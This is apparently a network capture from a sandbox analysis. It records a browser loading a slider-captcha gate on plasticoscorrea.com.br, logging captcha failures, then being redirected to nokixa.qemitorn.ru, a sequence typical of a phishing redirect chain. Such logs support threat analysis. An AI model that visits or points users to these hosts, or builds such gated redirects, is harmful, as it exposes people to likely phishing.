                                                                                                        2025-01-09 16:17:53 UTC254INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:17:53 GMT
                                                                                                        Server: Apache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Last-Modified: Tue, 07 Jan 2025 16:40:09 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 3902
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Type: text/css
                                                                                                        2025-01-09 16:17:53 UTC3902INData Raw: 62 6f 64 79 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 38 66 39 66 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 20 73 79
                                                                                                        Data Ascii: body { overflow-x: hidden; overflow-y: hidden; margin: 0; height: 100vh; display: flex; flex-direction: column; align-items: center; justify-content: center; background-color: #f8f9fa; font-family: ui-sans-serif, sy


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.1749711162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:53 UTC624OUTGET /script/disk/longbow.slidercaptcha.js HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://plasticoscorrea.com.br/script/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
                                                                                                        2025-01-09 16:17:53 UTC269INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:17:53 GMT
                                                                                                        Server: Apache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Last-Modified: Tue, 07 Jan 2025 16:40:09 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 13665
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Type: application/javascript
                                                                                                        2025-01-09 16:17:53 UTC7923INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 20 20 20 20 76 61 72 20 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 6f 62 6a 65 63 74 22 20 26 26 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 20 3d 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                        Data Ascii: (function () { 'use strict'; var extend = function () { var length = arguments.length; var target = arguments[0] || {}; if (typeof target != "object" && typeof target != "function") { target = {}; }
                                                                                                        2025-01-09 16:17:53 UTC5742INData Raw: 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 77 69 64 74 68 20 2b 20 27 2f 27 20 2b 20 74 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 68 65 69 67 68 74 20 2b 20 27 2f 3f 69 6d 61 67 65 3d 27 20 2b 20 4d 61 74 68 2e 72 6f 75 6e 64 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2a 20 32 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 73 49 45 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 68 72 2e 6f 6e 6c 6f 61 64 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6c 65 20
                                                                                                        Data Ascii: hat.options.width + '/' + that.options.height + '/?image=' + Math.round(Math.random() * 20); } if (isIE) { var xhr = new XMLHttpRequest(); xhr.onloadend = function (e) { var file


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.1749715172.67.74.1634431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:54 UTC632OUTGET /280/155/?image=3 HTTP/1.1
                                                                                                        Host: picsum.photos
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Origin: https://plasticoscorrea.com.br
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://plasticoscorrea.com.br/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:17:54 UTC1025INHTTP/1.1 302 Found
                                                                                                        Date: Thu, 09 Jan 2025 16:17:54 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        location: https://fastly.picsum.photos/id/3/280/155.jpg?hmac=ite98zqAClj8uWN6ISfDHxlLcRWelYXBbLBFBsRYzuk
                                                                                                        access-control-allow-origin: *
                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                        vary: Origin
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYfHcwV9K73GDITlDzKPnMgaDOHD5tP9Xpa8b72v4eswf5sWB%2F8yUTJHaT0tkvWWqDORDfcd0egzXyn16IqPavZYdLNIhcTPiGqeuy7QfxxSb4fZu0LsJhUR7uerRJI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5bd7a48924326-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1630&rtt_var=631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1210&delivery_rate=1707602&cwnd=178&unsent_bytes=0&cid=a7ee89ae1216c412&ts=523&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.1749719162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:54 UTC434OUTGET /script/disk/longbow.slidercaptcha.js HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
                                                                                                        2025-01-09 16:17:54 UTC269INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:17:54 GMT
                                                                                                        Server: Apache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Last-Modified: Tue, 07 Jan 2025 16:40:09 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 13665
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Type: application/javascript
                                                                                                        2025-01-09 16:17:54 UTC7923INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 20 20 20 20 76 61 72 20 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 6f 62 6a 65 63 74 22 20 26 26 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 20 3d 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                        Data Ascii: (function () { 'use strict'; var extend = function () { var length = arguments.length; var target = arguments[0] || {}; if (typeof target != "object" && typeof target != "function") { target = {}; }
                                                                                                        2025-01-09 16:17:54 UTC5742INData Raw: 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 77 69 64 74 68 20 2b 20 27 2f 27 20 2b 20 74 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 68 65 69 67 68 74 20 2b 20 27 2f 3f 69 6d 61 67 65 3d 27 20 2b 20 4d 61 74 68 2e 72 6f 75 6e 64 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2a 20 32 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 73 49 45 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 68 72 2e 6f 6e 6c 6f 61 64 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6c 65 20
                                                                                                        Data Ascii: hat.options.width + '/' + that.options.height + '/?image=' + Math.round(Math.random() * 20); } if (isIE) { var xhr = new XMLHttpRequest(); xhr.onloadend = function (e) { var file


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.1749725162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:55 UTC659OUTGET /favicon.ico HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://plasticoscorrea.com.br/script/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
                                                                                                        2025-01-09 16:17:56 UTC373INHTTP/1.1 302 Found
                                                                                                        Date: Thu, 09 Jan 2025 16:17:55 GMT
                                                                                                        Server: Apache
                                                                                                        Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/"
                                                                                                        X-Redirect-By: WordPress
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Location: https://plasticoscorrea.com.br/wp-content/uploads/2024/09/cropped-icone-32x32.png
                                                                                                        Content-Length: 0
                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.1749727162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:56 UTC698OUTGET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://plasticoscorrea.com.br/script/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
                                                                                                        2025-01-09 16:17:56 UTC232INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:17:56 GMT
                                                                                                        Server: Apache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Last-Modified: Fri, 11 Oct 2024 18:47:11 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 1982
                                                                                                        Content-Type: image/png
                                                                                                        2025-01-09 16:17:56 UTC1982INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 07 85 49 44 41 54 58 c3 bd 97 69 6c 54 d7 15 c7 7f f7 bd 37 bb 97 b1 cd 18 83 01 2f 21 b6 07 db 20 30 10 20 c2 d0 04 2a 1a 4c 03 82 d0 00 55 49 5a 4d b7 54 58 55 4a a8 1a a2 4a 4d bf 94 56 6d 9a 34 52 15 54 29 ad d4 40 1a b5 6c 86 80 ca 16 4c 09 01 52 8c 6b b0 8d 81 d8 40 bc db 33 f6 8c 67 9f 77 fb 61 c6 63 e3 98 66 a4 54 39 9f 9e ee 76 ce 3d e7 ff ff df f3 04 9f 63 4e 57 dd 53 c0 7b 80 75 c2 d4 db 08 e9 6a 7e 6b 5d 94 2f 60 4a 0a 6b 5a 80 de 09 63 12 f8 38 26 f9 42 ce 01 b4 14 d6 98 97 3a a7 18 cb 0b 32 93 03 3d 9e 20 67 ae f5 e8 97 5f 5f c3 97 11 80 9a 6e d1 d4 99 8e b1 0a c4 74 89 22 84 89 ff 83 a5 14 80 3d cd a8 ce 9c 62 45 08 81 44 e2 0f c5 50 15
                                                                                                        Data Ascii: PNGIHDR szzIDATXilT7/! 0 *LUIZMTXUJJMVm4RT)@lLRk@3gwacfT9v=cNWS{uj~k]/`JkZc8&B:2= g__nt"=bEDP


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.1749728162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:57 UTC448OUTGET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
                                                                                                        2025-01-09 16:17:57 UTC232INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:17:57 GMT
                                                                                                        Server: Apache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Last-Modified: Fri, 11 Oct 2024 18:47:11 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 1982
                                                                                                        Content-Type: image/png
                                                                                                        2025-01-09 16:17:57 UTC1982INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 07 85 49 44 41 54 58 c3 bd 97 69 6c 54 d7 15 c7 7f f7 bd 37 bb 97 b1 cd 18 83 01 2f 21 b6 07 db 20 30 10 20 c2 d0 04 2a 1a 4c 03 82 d0 00 55 49 5a 4d b7 54 58 55 4a a8 1a a2 4a 4d bf 94 56 6d 9a 34 52 15 54 29 ad d4 40 1a b5 6c 86 80 ca 16 4c 09 01 52 8c 6b b0 8d 81 d8 40 bc db 33 f6 8c 67 9f 77 fb 61 c6 63 e3 98 66 a4 54 39 9f 9e ee 76 ce 3d e7 ff ff df f3 04 9f 63 4e 57 dd 53 c0 7b 80 75 c2 d4 db 08 e9 6a 7e 6b 5d 94 2f 60 4a 0a 6b 5a 80 de 09 63 12 f8 38 26 f9 42 ce 01 b4 14 d6 98 97 3a a7 18 cb 0b 32 93 03 3d 9e 20 67 ae f5 e8 97 5f 5f c3 97 11 80 9a 6e d1 d4 99 8e b1 0a c4 74 89 22 84 89 ff 83 a5 14 80 3d cd a8 ce 9c 62 45 08 81 44 e2 0f c5 50 15
                                                                                                        Data Ascii: PNGIHDR szzIDATXilT7/! 0 *LUIZMTXUJJMVm4RT)@lLRk@3gwacfT9v=cNWS{uj~k]/`JkZc8&B:2= g__nt"=bEDP


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.1749736162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:20 UTC698OUTPOST /script/sliderFail.php HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 13
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Content-Type: application/json
                                                                                                        Accept: */*
                                                                                                        Origin: https://plasticoscorrea.com.br
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://plasticoscorrea.com.br/script/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
                                                                                                        2025-01-09 16:18:20 UTC13OUTData Raw: 7b 22 66 61 69 6c 22 3a 74 72 75 65 7d
                                                                                                        Data Ascii: {"fail":true}
                                                                                                        2025-01-09 16:18:20 UTC310INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:20 GMT
                                                                                                        Server: Apache
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: application/json
                                                                                                        2025-01-09 16:18:20 UTC78INData Raw: 34 33 0d 0a 7b 22 62 6c 6f 63 6b 65 64 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 72 6f 6e 74 2d 65 6e 64 20 66 61 69 6c 20 72 65 63 6f 72 64 65 64 22 2c 22 66 61 69 6c 43 6f 75 6e 74 22 3a 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 43{"blocked":false,"message":"Front-end fail recorded","failCount":1}0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.1749737162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:21 UTC419OUTGET /script/sliderFail.php HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
                                                                                                        2025-01-09 16:18:21 UTC310INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:21 GMT
                                                                                                        Server: Apache
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: application/json
                                                                                                        2025-01-09 16:18:21 UTC78INData Raw: 34 33 0d 0a 7b 22 62 6c 6f 63 6b 65 64 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 72 6f 6e 74 2d 65 6e 64 20 66 61 69 6c 20 72 65 63 6f 72 64 65 64 22 2c 22 66 61 69 6c 43 6f 75 6e 74 22 3a 32 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 43{"blocked":false,"message":"Front-end fail recorded","failCount":2}0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.1749738172.67.74.1634431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:21 UTC633OUTGET /280/155/?image=13 HTTP/1.1
                                                                                                        Host: picsum.photos
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Origin: https://plasticoscorrea.com.br
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://plasticoscorrea.com.br/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:21 UTC1026INHTTP/1.1 302 Found
                                                                                                        Date: Thu, 09 Jan 2025 16:18:21 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        location: https://fastly.picsum.photos/id/13/280/155.jpg?hmac=cHZfJPqHBsmeAvAhZneVIh61xpa9-HeBV7Edthv_G5k
                                                                                                        access-control-allow-origin: *
                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                        vary: Origin
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Lrlc1n3JfzsjP9TVXiaGI5WPwQLpxSeBYku78TisJ8xAjG3flHRYnxT8xUl0CoiRjqsY6eKEnKqjNRh%2FzFGCQVsLCjXIKeYLxbYvbYTU5V1DDrx5lrbEAHjKPkGlFo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be249e6dc466-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1501&rtt_var=571&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1211&delivery_rate=1904761&cwnd=219&unsent_bytes=0&cid=2781f9b356de67c3&ts=518&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.1749742104.21.58.1744431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:31 UTC694OUTGET /yz8E/ HTTP/1.1
                                                                                                        Host: nokixa.qemitorn.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Referer: https://plasticoscorrea.com.br/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:32 UTC1246INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:32 GMT
